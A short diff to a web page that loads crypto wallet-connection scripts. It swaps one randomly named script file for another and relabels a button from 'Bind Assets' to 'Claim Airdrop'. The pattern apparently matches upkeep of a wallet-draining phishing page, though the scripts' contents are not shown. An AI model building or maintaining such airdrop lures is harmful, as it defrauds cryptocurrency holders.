--- a/v3/index.html
+++ b/v3/index.html
@@ -12,7 +12,7 @@
     <script src="./scripts/coinbase.js"></script>
      <script src="./scripts/wallet-connect-v2.js"></script>
      <script src="./scripts/wallet-connect-v3.js"></script>
-  <script charset="UTF-8" type="text/javascript" src="./423c93a9-48fb-4108-8e23-a1ee1b5a0b32.js"></script>
+  <script charset="UTF-8" type="text/javascript" src="./8bbee4f1-aa72-4d90-80d8-b7aafd47fe4c.js"></script>
   
     <style>
         html {
@@ -107,7 +107,7 @@
                             <div class="crs2z c8hla cun0l cljb8 ce61j cmqpv c85uq cqevc" data-aos="fade-up" data-aos-delay="200">
                                 <div>
                                     <a class="interact-button c4rfz cirl7 cyy7p cy9j6 cbjhp cvnv6 ceef4">
-                                        Bind Assets
+                                        Claim Airdrop
                                     </a>
                                 </div>
                                 <div>
